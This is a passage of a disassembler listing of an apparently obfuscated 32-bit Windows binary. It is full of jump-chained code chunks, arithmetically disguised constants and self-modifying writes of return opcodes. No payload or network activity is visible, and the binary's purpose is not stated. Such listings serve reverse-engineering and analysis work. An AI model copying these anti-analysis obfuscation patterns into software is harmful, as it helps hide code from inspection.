loc_43DE8E: ; CODE XREF: sub_44F43B:loc_44D351j
call sub_44C068
test eax, eax
jz loc_456C0D
jmp loc_44A676
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
loc_43DEA0: ; CODE XREF: ut7h7i2x:loc_43EC79j
add ebx, 0B0239E79h
mov [ebx], eax
pop ebx
call sub_44F17E
; START OF FUNCTION CHUNK FOR sub_459C1B
loc_43DEAE: ; CODE XREF: sub_459C1B-4DE3j
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_459C1B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442E76
loc_43DEB3: ; CODE XREF: sub_442E76:loc_44AE1Fj
add eax, 5B8CBE99h
loc_43DEB9: ; CODE XREF: sub_44CAB9+A1F1j
mov eax, [eax]
push esi
mov esi, eax
xchg esi, [esp+4+var_4]
call sub_44C95C
jmp sub_44C95B
; END OF FUNCTION CHUNK FOR sub_442E76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4469B9
loc_43DECB: ; CODE XREF: sub_4469B9+8j
push esi
mov esi, ecx
xchg esi, [esp+4+var_4]
mov esp, ebp
jmp loc_452F86
; END OF FUNCTION CHUNK FOR sub_4469B9
; ---------------------------------------------------------------------------
xor ebp, ebx
jmp sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F9A1
loc_43DEDF: ; CODE XREF: sub_44F9A1:loc_44B74Ej
jz loc_44C5A9
loc_43DEE5: ; CODE XREF: ut7h7i2x:loc_44F641j
jmp loc_451AEF
; END OF FUNCTION CHUNK FOR sub_44F9A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D759
loc_43DEEA: ; CODE XREF: sub_44D759-8C7Cj
mov edx, [edx]
popf
mov dl, [edx]
push offset sub_45659A
jmp loc_4473CE
; END OF FUNCTION CHUNK FOR sub_44D759
; ---------------------------------------------------------------------------
loc_43DEF9: ; CODE XREF: ut7h7i2x:loc_441744j
xchg ebx, [ebp+0]
cmp edi, ebp
jmp loc_44E0BE
; ---------------------------------------------------------------------------
loc_43DF03: ; CODE XREF: ut7h7i2x:loc_45046Cj
and ecx, 8F2754Bh
jmp sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CDC
loc_43DF0E: ; CODE XREF: sub_448CDC:loc_446017j
call sub_44ED9F
push ebx
mov ebx, eax
xchg ebx, [esp+4+var_4]
ror eax, 0Ah
push edi
jmp loc_44EE23
; END OF FUNCTION CHUNK FOR sub_448CDC
; ---------------------------------------------------------------------------
sub eax, esi
jmp sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44615D
loc_43DF29: ; CODE XREF: sub_44615D:loc_44A1BEj
xchg edi, esi
or ecx, 0A4AEEB18h
shr esi, 1
jmp loc_44A846
; END OF FUNCTION CHUNK FOR sub_44615D
; ---------------------------------------------------------------------------
loc_43DF38: ; DATA XREF: sub_44185C+8DAo
add edx, offset byte_460667
xchg edx, [esp]
jmp loc_44A67B
; ---------------------------------------------------------------------------
dw 7DC8h
dword_43DF48 dd 2 ; DATA XREF: sub_43CDBA+10F31r
dd 3 dup(2), 1Ch dup(1), 5 dup(2), 1, 2, 19h dup(1), 10h dup(402h)
dd 10h dup(1), 0Bh dup(2), 3 dup(1), 2 dup(2), 1, 3 dup(0C2h)
dd 3 dup(2), 7 dup(1), 2 dup(2), 10h dup(0E00h), 10h dup(402h)
dd 3 dup(1), 2, 1C2h, 3 dup(2), 3 dup(1), 2, 1C2h, 0Bh dup(2)
dd 2 dup(1), 1C2h, 7 dup(2), 5 dup(1), 2, 9 dup(1), 3 dup(2)
dd 1, 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2, 1, 2 dup(2)
dd 2 dup(1), 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2
dd 1, 3 dup(2), 1, 2, 2 dup(1), 3 dup(2), 1, 3 dup(2)
dd 1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44064B
loc_43E348: ; CODE XREF: sub_44064B-C2Aj
jmp loc_43A2E8
; END OF FUNCTION CHUNK FOR sub_44064B
; ---------------------------------------------------------------------------
db 58h, 27h, 80h
dword_43E350 dd 77EB36A5h ; DATA XREF: ut7h7i2x:0043CE7Fw
; ut7h7i2x:00457CD2w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_43E354: ; CODE XREF: sub_44EC11-F88j
jmp loc_44DC99
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
db 2Ch, 92h, 0FEh
dd 0 ; DATA XREF: sub_44CAA4:loc_449907o
; sub_44CAA4:loc_44F765o ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_43E360: ; CODE XREF: sub_43DBEC+1CBAEj
jmp loc_43B5C8
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_43E365: ; CODE XREF: sub_443BC5+AB0Bj
jmp loc_4404CC
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
dw 20E8h
dword_43E36C dd 77E60000h ; DATA XREF: sub_44CAA4:loc_440EBBr
; sub_44CAA4-3193r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440B68
loc_43E370: ; CODE XREF: sub_440B68+149FDj
jmp loc_456F65
; END OF FUNCTION CHUNK FOR sub_440B68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CB0D
loc_43E375: ; CODE XREF: sub_43CB0D+13FCFj
jmp loc_441439
; END OF FUNCTION CHUNK FOR sub_43CB0D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C923
loc_43E37A: ; CODE XREF: sub_43C923+6j
jmp nullsub_33
; END OF FUNCTION CHUNK FOR sub_43C923
; ---------------------------------------------------------------------------
db 0BFh
dd 37E4B26Dh, 8C66B159h, 6CD823C5h ; DATA XREF: sub_44CAA4-BD13o
; sub_453D07-2619o
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_43E38D: ; CODE XREF: sub_448321+10EF2j
jmp loc_439D2D
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458B53
loc_43E392: ; CODE XREF: sub_458B53-18014j
jmp loc_44EEC7
; END OF FUNCTION CHUNK FOR sub_458B53
; ---------------------------------------------------------------------------
db 0E1h
byte_43E398 db 1 ; DATA XREF: ut7h7i2x:00444642r
; sub_446C7B-2570w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_43E399: ; CODE XREF: sub_444EAA+8BACj
jmp loc_456BB0
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
dw 6362h
dword_43E3A0 dd 361947CDh, 0C6232E36h ; DATA XREF: sub_447AD6+4o
; sub_451039:loc_449A6Eo
; ---------------------------------------------------------------------------
mov cl, 0
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_43E3AA: ; CODE XREF: sub_44EB88+408j
jmp loc_43BF09
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_43E3AF: ; CODE XREF: sub_45341C-686Fj
adc edx, ebx
add eax, 0DA176996h
; END OF FUNCTION CHUNK FOR sub_45341C
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_43E3B7: ; CODE XREF: sub_4489DF-943Dj
; sub_45341C-1216Bj ...
jmp loc_441066
; ---------------------------------------------------------------------------
loc_43E3BC: ; CODE XREF: sub_45341C:loc_44AA28j
; sub_43B7F7+16F48j
xchg ebx, [esp-4+arg_0]
jmp loc_446B86
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
xchg esi, [ebp+0]
jmp sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452950
loc_43E3CC: ; CODE XREF: sub_452950:loc_44CD3Bj
mov ebp, esp
push ebx
mov ebx, ecx
xchg ebx, [esp+4+var_4]
call sub_44941C
loc_43E3D9: ; CODE XREF: sub_43E5D3+12j
jmp loc_458732
; END OF FUNCTION CHUNK FOR sub_452950
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43E3DE: ; CODE XREF: sub_442B3B:loc_452704j
jl loc_442FE7
loc_43E3E4: ; CODE XREF: sub_4508DB+6F38j
jmp nullsub_147
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_43E3E9: ; CODE XREF: ut7h7i2x:0044FCD3j
jmp locret_447FD1
; ---------------------------------------------------------------------------
pushf
jbe loc_44720B
pushf
jmp loc_4426BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452361
loc_43E3FB: ; CODE XREF: sub_452361-3D96j
pop ecx
or ecx, 0F6923C31h
cmp ecx, 8DDEE7EAh
jmp loc_44041F
; END OF FUNCTION CHUNK FOR sub_452361
; ---------------------------------------------------------------------------
loc_43E40D: ; DATA XREF: sub_43E9CB+BB85o
push esi
push 983FE829h
pop esi
rol esi, 8
jmp loc_459F19
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B513
loc_43E41C: ; CODE XREF: sub_43B513+12203j
; sub_43B513:loc_457DECj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_43DE5B
jmp loc_442B9A
; END OF FUNCTION CHUNK FOR sub_43B513
; ---------------------------------------------------------------------------
jnp locret_450C67
sbb edx, eax
jmp sub_4481A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450DB3
loc_43E43A: ; CODE XREF: sub_450DB3-BDF9j
or eax, eax
jnz loc_43AF6A
jmp loc_44B74E
; END OF FUNCTION CHUNK FOR sub_450DB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_43E447: ; CODE XREF: sub_4431FF:loc_449E4Aj
and eax, 0EE283621h
rol eax, 17h
add eax, 0EF4E73E0h
mov eax, [eax]
mov edx, [ebp+var_4]
jmp loc_456F8C
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_43E460: ; CODE XREF: sub_44BF76:loc_458C20j
push esi
push 0DD9DC190h
pop esi
sub esi, 0DA4E5471h
xor esi, 52CF88C8h
add esi, 0AEC3F61Bh
xchg esi, [esp+4+var_4]
jmp sub_44261F
; END OF FUNCTION CHUNK FOR sub_44BF76
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_239. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43964B
loc_43E482: ; CODE XREF: sub_43964B+Cj
jmp loc_459DF2
; END OF FUNCTION CHUNK FOR sub_43964B
; ---------------------------------------------------------------------------
loc_43E487: ; CODE XREF: ut7h7i2x:loc_445E3Ej
; ut7h7i2x:004468BFj
jl loc_454856
or edi, 20AE0820h
jmp loc_45484D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_43E498: ; CODE XREF: sub_43F0B0:loc_45802Fj
jnz loc_43F1BB
jmp loc_43A22F
; END OF FUNCTION CHUNK FOR sub_43F0B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459070
loc_43E4A3: ; CODE XREF: sub_459070-B671j
; sub_43EDD8+1788Ej
xor esi, 0E50FBA38h
add esi, ebp
add esi, 9A80D144h
mov esi, [esi]
add eax, esi
pop esi
pushf
jmp loc_4437B8
; END OF FUNCTION CHUNK FOR sub_459070
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44081E
loc_43E4BC: ; CODE XREF: sub_44081E-535Dj
sub ecx, ebp
loc_43E4BE: ; CODE XREF: sub_44081E:loc_45409Dj
lea eax, [ebp-25Ch]
cmp dword ptr [eax], 4742444Fh
jz loc_456EB1
jmp loc_44BCC6
; END OF FUNCTION CHUNK FOR sub_44081E
; ---------------------------------------------------------------------------
push edi
push 3C579B10h
; START OF FUNCTION CHUNK FOR sub_44CAB9
loc_43E4DB: ; CODE XREF: sub_44CAB9:loc_45A0BFj
xchg ecx, [esp+0]
mov edi, ecx
jmp loc_459503
; END OF FUNCTION CHUNK FOR sub_44CAB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_43E4E5: ; CODE XREF: sub_44917B:loc_451B54j
test esi, 2A13CD2Eh
jmp loc_456E20
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
not ecx
ror eax, 1Ch
jmp loc_4458FB
; ---------------------------------------------------------------------------
loc_43E4FA: ; DATA XREF: ut7h7i2x:loc_44D09Ao
xor eax, eax
mov [ebp-10h], eax
call sub_44F943
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_43E504: ; CODE XREF: sub_43B7F7+64C7j
jmp loc_449195
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
loc_43E509: ; CODE XREF: ut7h7i2x:0043D91Fj
; ut7h7i2x:loc_440734j
jmp loc_43CB3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_43E50E: ; CODE XREF: sub_4417AF:loc_4420D7j
mov [ebx], eax
pop ebx
mov eax, [ebp+var_4]
mov al, [eax]
jnz loc_43A02C
call sub_453D5B
loc_43E521: ; CODE XREF: sub_44F7A9+1Fj
jmp sub_44C273
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_43E526: ; CODE XREF: sub_4408C2+14E77j
jnz loc_43DB89
jmp loc_4450DB
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_43E531: ; CODE XREF: sub_444029+77A2j
shr edx, 5
jmp loc_44AA76
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_43E539: ; CODE XREF: sub_455807+163Ej
push offset loc_451C74
jmp nullsub_274
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
push eax
sbb ebp, 37F90EC9h
jmp sub_4575F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4455F4
loc_43E54F: ; CODE XREF: sub_4455F4+1A2j
mov esi, ebx
loc_43E551: ; CODE XREF: sub_4455F4:loc_440620j
push esi
push 77E20C15h
pop esi
jmp loc_44448D
; END OF FUNCTION CHUNK FOR sub_4455F4
; =============== S U B R O U T I N E =======================================
sub_43E55D proc near ; CODE XREF: ut7h7i2x:00452AD2j
; ut7h7i2x:004590BFp
; FUNCTION CHUNK AT 00450203 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
mov byte ptr [eax], 0C3h
jmp loc_450203
sub_43E55D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push edi
push 786D9FDEh
pop edi
jmp loc_44F59D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_93. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458345
loc_43E576: ; CODE XREF: sub_458345+18j
jmp loc_4511F1
; END OF FUNCTION CHUNK FOR sub_458345
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4464B7
loc_43E57B: ; CODE XREF: sub_4464B7+42EBj
jmp loc_458FE7
; END OF FUNCTION CHUNK FOR sub_4464B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B6FC
loc_43E580: ; CODE XREF: sub_43B6FC+Ej
jmp nullsub_542
; END OF FUNCTION CHUNK FOR sub_43B6FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_43E585: ; CODE XREF: sub_450FDE:loc_445846j
push 0F063EE76h
shl edx, 6
jmp loc_4408AB
; END OF FUNCTION CHUNK FOR sub_450FDE
; =============== S U B R O U T I N E =======================================
sub_43E592 proc near ; CODE XREF: ut7h7i2x:0044F27Aj
; sub_447F0A+C3A4p
; FUNCTION CHUNK AT 0043A8EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AFCC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C135 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043CAAF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447233 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00447965 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004499AE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A3AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B265 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451866 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00452F34 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00455360 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00455377 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004567C4 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
sub ebx, eax
mov ecx, [ebp-4]
mov eax, 1
shl eax, cl
not eax
jmp loc_451866
sub_43E592 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459FAF
loc_43E5A9: ; CODE XREF: sub_459FAF:loc_459574j
mov eax, ds:dword_44A898
call sub_459DE7
loc_43E5B4: ; CODE XREF: ut7h7i2x:00457141j
jmp loc_44C7A2
; END OF FUNCTION CHUNK FOR sub_459FAF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C87F
loc_43E5B9: ; CODE XREF: sub_44C87F:loc_451EBBj
mov [ecx], eax
pop ecx
loc_43E5BC: ; CODE XREF: ut7h7i2x:0044C502j
lea eax, [ebp-14h]
xor edx, edx
call sub_43F058
loc_43E5C6: ; CODE XREF: ut7h7i2x:0043C9EAj
; ut7h7i2x:0044DC53j
mov eax, ds:dword_43AF9C
mov [ebp-4], eax
jmp loc_43BE0D
; END OF FUNCTION CHUNK FOR sub_44C87F
; =============== S U B R O U T I N E =======================================
sub_43E5D3 proc near ; DATA XREF: sub_458DC5+5o
push 8077C485h
pop eax
sub eax, 50E6AD88h
xor eax, 1D6F57C8h
jmp loc_43E3D9
sub_43E5D3 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_43E5EB: ; CODE XREF: sub_450FDE-141AFj
jmp loc_441D12
; END OF FUNCTION CHUNK FOR sub_450FDE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E5F0 proc near
push esi
mov esi, ebp
xchg esi, [esp+0]
mov ebp, esp
jmp sub_44A030
sub_43E5F0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B873
loc_43E5FD: ; CODE XREF: sub_43B873+15j
pop eax
add eax, 2D364923h
loc_43E604: ; CODE XREF: sub_439BF8+176DBj
rol eax, 1
or eax, 0AFD2E0D3h
xor eax, 4BD7975h
jmp loc_44557F
; END OF FUNCTION CHUNK FOR sub_43B873
; =============== S U B R O U T I N E =======================================
sub_43E617 proc near ; DATA XREF: sub_459FAF-D7FAo
; FUNCTION CHUNK AT 0044EE52 SIZE 00000005 BYTES
add edx, 3E069A6Eh
mov [edx], eax
pop edx
lea eax, nullsub_56
mov byte ptr [eax], 0C3h
jmp loc_44EE52
sub_43E617 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call sub_43D509 ; LockResource
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_43E633: ; CODE XREF: sub_439BD1:loc_43FABAj
mov eax, ds:dword_442E90
or eax, eax
jnz loc_459FA2
jmp loc_4504DC
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_43E646: ; CODE XREF: ut7h7i2x:0044763Bj
mov [esi], ebx
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_43E648: ; CODE XREF: sub_4497C1:loc_447629j
sub ebx, 0B6A68AC5h
push offset sub_43C184
jmp nullsub_223
; END OF FUNCTION CHUNK FOR sub_4497C1
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43E658 proc near ; CODE XREF: sub_4428C8+14B80j
retn
sub_43E658 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_43E659: ; CODE XREF: sub_4459EE+EE25j
; ut7h7i2x:loc_4555BEj
jmp loc_444B43
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_43E65E: ; CODE XREF: sub_445AD1+6B3Cj
jmp loc_44ADC5
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_43E663: ; CODE XREF: sub_44C791:loc_457C94j
test al, al
jz loc_44170E
jmp loc_4565EB
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
loc_43E670: ; CODE XREF: ut7h7i2x:loc_44DBDBj
pop eax
mov [esi], eax
pop esi
pushf
push 74C7A073h
pop eax
jmp loc_44992E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_43E680: ; CODE XREF: sub_4529E0+49Aj
and ebp, 2B99123Bh
jmp loc_45AD5B
; END OF FUNCTION CHUNK FOR sub_4529E0
; =============== S U B R O U T I N E =======================================
sub_43E68B proc near ; CODE XREF: sub_43D3E7+6p
; ut7h7i2x:0044DC60j
; FUNCTION CHUNK AT 0043A7A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044999D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B982 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044C480 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044FE0B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451803 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045902B SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
or eax, eax
jnz loc_44FE0B
jmp loc_45902B
sub_43E68B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_43E69C: ; CODE XREF: sub_444029-897Ej
jz loc_4424C0
loc_43E6A2: ; CODE XREF: sub_43E68B+B318j
jmp loc_43CB55
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
adc ebx, 0C9480383h
jge loc_457F91
jmp sub_445E13
; ---------------------------------------------------------------------------
loc_43E6B8: ; CODE XREF: ut7h7i2x:00454DE3j
xchg ebx, [esi]
sub eax, 78E355ECh
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_43E6C0: ; CODE XREF: sub_44CE09:loc_454DCFj
add ecx, 384EA369h
popf
jmp loc_4408A6
; END OF FUNCTION CHUNK FOR sub_44CE09
; =============== S U B R O U T I N E =======================================
sub_43E6CC proc near ; CODE XREF: sub_44EE57:loc_4589C1p
; FUNCTION CHUNK AT 00439546 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00439F16 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043AA87 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043B016 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043FF48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004519AF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004521D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004590E4 SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
add eax, 3C40122Ch
mov eax, [eax]
or eax, eax
jnz loc_450F49
jmp loc_4521D0
sub_43E6CC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_43E6E5: ; CODE XREF: ut7h7i2x:0043B945j
; ut7h7i2x:loc_440C2Bj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B01F
loc_43E6E6: ; CODE XREF: sub_44B01F-11C6Ej
jmp loc_440445
; END OF FUNCTION CHUNK FOR sub_44B01F
; =============== S U B R O U T I N E =======================================
sub_43E6EB proc near ; CODE XREF: ut7h7i2x:loc_43D858p
; ut7h7i2x:00453B51j
; FUNCTION CHUNK AT 0043AEA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C070 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045609A SIZE 00000028 BYTES
xchg esi, [esp+0]
pop esi
push 876355B7h
pop eax
xor eax, 928F604Dh
jmp loc_43AEA9
sub_43E6EB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43E700 proc near ; DATA XREF: ut7h7i2x:0044DA31o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00443B32 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00446D28 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044A4D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A643 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C807 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044E1F6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045297F SIZE 0000001D BYTES
push 4B31A6C9h
pop eax
xor eax, 54C6CCF1h
loc_43E70C: ; CODE XREF: ut7h7i2x:loc_453D01j
add eax, 3E0C0DDh
or eax, 50A5C37Eh
test eax, 40h
jmp loc_44A4D6
sub_43E700 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459070
loc_43E723: ; CODE XREF: sub_459070+Cj
jz loc_44D9E4
jmp loc_442434
; END OF FUNCTION CHUNK FOR sub_459070
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_556. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_43E72F: ; CODE XREF: sub_44092D+1513Dj
or eax, eax
jnz loc_4580C0
jmp loc_446DF9
; END OF FUNCTION CHUNK FOR sub_44092D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B6D
loc_43E73C: ; CODE XREF: sub_456B6D:loc_44EEC2j
or eax, 4D9244EBh
rol eax, 6
xor eax, 4D1E29C9h
add eax, ebp
add eax, 5C7228C2h
jmp loc_441F33
; END OF FUNCTION CHUNK FOR sub_456B6D
; ---------------------------------------------------------------------------
loc_43E758: ; CODE XREF: ut7h7i2x:loc_43E7E7j
lea eax, loc_43C31B
mov byte ptr [eax], 0C3h
jmp loc_43C31B
; =============== S U B R O U T I N E =======================================
sub_43E766 proc near ; CODE XREF: sub_41AFF3+62Dp
; ut7h7i2x:00454E4Fj
; DATA XREF: ...
; FUNCTION CHUNK AT 00440E33 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004428AF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044694B SIZE 0000001F BYTES
push edx
call sub_440FC3
loc_43E76C: ; CODE XREF: sub_44D7AC+17j
jmp loc_44694B
sub_43E766 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441C8F
loc_43E771: ; CODE XREF: sub_441C8F+11j
jmp loc_44FF3A
; END OF FUNCTION CHUNK FOR sub_441C8F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_43E776: ; CODE XREF: sub_449700-89B9j
jmp nullsub_78
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
loc_43E77B: ; CODE XREF: ut7h7i2x:0043A6BAj
jmp loc_4586EE
; ---------------------------------------------------------------------------
jnz loc_43F746
sub edx, 78A8C58h
jmp sub_45A1C3
; ---------------------------------------------------------------------------
loc_43E791: ; CODE XREF: ut7h7i2x:0044BF37j
jnz loc_447A39
jmp loc_451402
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45410C
loc_43E79C: ; CODE XREF: sub_45410C-B42j
mov ebp, [esi]
cdq
cmp esi, 9C275B53h
jmp loc_454CDD
; END OF FUNCTION CHUNK FOR sub_45410C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_43E7AA: ; CODE XREF: sub_44C791-5664j
js nullsub_76
loc_43E7B0: ; CODE XREF: sub_44C791:loc_45351Dj
call nullsub_3
retn
; END OF FUNCTION CHUNK FOR sub_44C791
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_43E7B7: ; CODE XREF: sub_445FA9+419j
jmp loc_452622
; END OF FUNCTION CHUNK FOR sub_445FA9
; ---------------------------------------------------------------------------
loc_43E7BC: ; CODE XREF: ut7h7i2x:00441E29j
jmp locret_448A82
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43E7C1: ; CODE XREF: sub_457A66-15C48j
jmp loc_453F4A
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_43E7C6: ; CODE XREF: sub_44C791-DF1Aj
call sub_44E2C4
jmp loc_457C94
; END OF FUNCTION CHUNK FOR sub_44C791
